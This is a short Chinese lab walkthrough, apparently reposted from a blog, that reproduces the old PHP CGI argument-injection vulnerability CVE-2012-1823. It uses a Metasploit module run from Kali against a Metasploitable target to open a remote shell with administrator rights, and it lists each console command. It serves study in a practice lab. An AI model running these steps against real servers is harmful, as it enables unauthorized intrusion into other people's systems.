标签:CGI cgi multi php http 漏洞 exploit injection PHP
PHP CGI漏洞利用
今日复现一个早期的漏洞,PHP CGI漏洞,代号为cve:2012-1823,该漏洞暂时只能攻击linux系统,属于linux漏洞
使用工具:攻击机kali linux、靶机metasploitable linux
具体步骤如下:
1.登入msfconsloe
2.搜索漏洞代号,输入 search cve:2012-1823
3.复制粘贴exploit/multi/http/php_cgi_arg_injection 或者use 0
详细如下:
msf > use exploit/multi/http/php_cgi_arg_injection
或者
msf > use 0
4.进行相关设置
msf6 exploit(multi/http/php_cgi_arg_injection) > set rhosts 192.168.30.141
rhosts => 192.168.30.141
msf6 exploit(multi/http/php_cgi_arg_injection) >
msf6 exploit(multi/http/php_cgi_arg_injection) > show options
5.开始攻击
msf6 exploit(multi/http/php_cgi_arg_injection) > exploit
6.攻击成功,输入shell,可进入被攻击方的命令提示符,权限为系统管理员权限
meterpreter > shell
标签:CGI,cgi,multi,php,http,漏洞,exploit,injection,PHP 来源: https://www.cnblogs.com/luuxiaoming/p/16589781.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。